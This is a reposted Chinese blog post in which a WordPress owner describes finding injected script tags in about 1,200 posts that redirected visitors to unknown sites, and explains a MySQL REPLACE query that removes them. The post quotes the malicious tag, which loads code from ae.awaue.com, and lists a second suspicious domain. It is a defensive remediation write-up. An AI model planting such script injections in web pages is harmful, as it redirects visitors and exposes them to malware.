技术头条 - 一个快速在微博传播文章的方式     搜索本站
您现在的位置首页 --> 安全 --> WordPress重定向漏洞

WordPress重定向漏洞

浏览:3201次  出处信息

今天访问自己blog时突然发现特慢,半天右栏都没加载出来。看了下状态栏,发现卡在一个url上过不去(http://ae.awaue.com/7),我想了又想,重来没有调用过外站资源,特别时这个陌生的站。第一反应就是可能被挂马了,上网查了一下没有太具体的说法,访问了下上面这个url也打不开,心生可疑。因为首页里只发现两条如下脚本,想实在没有方法解决,就先干掉这两个,过段时间看看情况。

<script src="http://ae.awaue.com/7"></script>

症状:

  • 浏览你网站文章的用户可能被重定向的第三方网站。(我今天遇到过一次,开始还纳闷我是点了什么跳到一个不认识的网站去的)
  • 也可能被重定向到googlesearch.com,不过这个已被禁用。

但好在最后还是依赖(mt)自己的wiki解决了这个问题,我绝非第一个遇到这问题,以后可能会复发,别的WPer也可能遇到,留个存档,出问题好回查。

解决方案如下,范讲一下,不只针对(mt)主机:

  • 登录你主机的管理后台,进入数据库管理,也就是mysqladmin
  • 在左边列表里找到你的wordpress所在数据库,如db_blog
  • 点击进入后,在顶部找到”SQL”一项,点击
  • 然后我们在输入框里输入以下语句,目的查找wp_posts里所有信息,并替换掉其中有害信息:

UPDATE wp_posts SET post_content = replace( post_content, '<script src="http://ae.awaue.com/7"></script>', ' ')

  • 接下来运行这段语句
  • 最后看一下影响了多少行,如果是0,说明你还没中招。我的跑了一下共替换了1200多条……

需要注意的是:上面的例子语句是举的默认情况,如果你的表名不是以wp_开头的,请换成你自己的,不要直接复制粘贴。

目前已发现的可疑脚本有以下两个:

  • ae.awaue.com/7
  • ie.eracou.com/3

如果未来发现有新的可疑脚本,请随时留意这里的更新

建议继续学习:

  1. WordPress评论翻页造成404页面的解决方案    (阅读:8033)
  2. WordPress插件开发 -- 在插件使用数据库存储数据    (阅读:5624)
  3. WordPress安全建议    (阅读:5361)
  4. WordPress插件开发--获知文章状态变化    (阅读:4568)
  5. WordPress数据字典    (阅读:4183)
  6. SEO:wordpress页面标记优化    (阅读:3624)
  7. WordPress模板的image.php    (阅读:3632)
  8. wordpress博客优化12条    (阅读:2924)
  9. SEO:wordpress相同内容网页优化    (阅读:2931)
  10. 简单好用的土办法抗击洋鬼子对wordpress系统的广告灌入    (阅读:2862)
QQ技术交流群:445447336,欢迎加入!
扫一扫订阅我的微信号:IT技术博客大学习
© 2009 - 2024 by blogread.cn 微博:@IT技术博客大学习

京ICP备15002552号-1